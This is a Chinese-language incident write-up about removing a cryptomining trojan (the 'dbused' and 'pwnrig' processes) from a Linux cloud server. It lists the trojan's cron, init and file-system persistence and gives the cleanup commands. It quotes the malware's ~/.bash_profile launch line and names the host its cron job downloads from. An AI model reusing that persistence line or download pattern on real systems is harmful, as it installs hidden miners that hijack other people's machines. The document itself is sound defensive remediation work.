表现
过了个周末,一觉醒来,服务器上部署的程序无法访问了,想ssh进入shell查看,shell也连接不上,去云服务器提供商后台查看监控曲线,发现cpu使用率一直在100%,在后台页面重启实例,进入shell进行恢复。
处理
使用top 命令查看CPU使用率,发现dbused进程高居榜首,就是它,干它!
驻留项
添加4个驻留项如下:
(1)bash启动项 ~/.bash_profile
在打开终端时将会执行该挖矿木马,注意需要到对应用户目录下清理bash_profile
cp -f -r -- /bin/bprofr /bin/dbused 2>/dev/null && /bin/dbused -c >/dev/null 2>&1 && rm -rf -- /bin/dbused 2>/dev/null
(2)crontab计划任务
第一个计划任务为下载脚本执行
crontab -l
查询定时任务,发现有任务定时从bash.givemexyx.in/xms 下载病毒文件,可能创建的crontab未知包括
/etc/cron.d/ngnix & apache
/etc/cron.hourly & daily & weekly & monthly
/var/spool/cron
/var/spool/cron/crontabs
另一个计划任务pwnrig则是直接启动挖矿进程
查询启动脚本的任务,注意,我用的centos *号要用单引号括住
find /etc/ -name '*' | xargs grep 'dbuse' -n 2>dev/null |grep cron
把左侧输出的文件删掉,如果删不掉,提示权限问题,则查看文件的属性
lsattr pwnrig 显示—i-a---------- pwnrig
使用命令删除属性 chattr -i -a pwnrig 之后就可以删除了
依次查看rc.d init.d 系统服务
相关文件统统删掉
进入到定时任务的文件夹/var/spool/cron/ 发现有个root的定时任务,删掉!
之后删除以下文件,如果存在的话
删除以下文件
/bin/bprofr
/bin/sysdr
/bin/crondr
/bin/initdr
/usr/bin/bprofr
/usr/bin/sysdr
/usr/bin/crondr
/usr/bin/initdr
/tmp/dbused
/tmp/dbusex
/tmp/xms
/tmp/x86_64
/tmp/i686
/tmp/go
/tmp/x64b
/tmp/x32b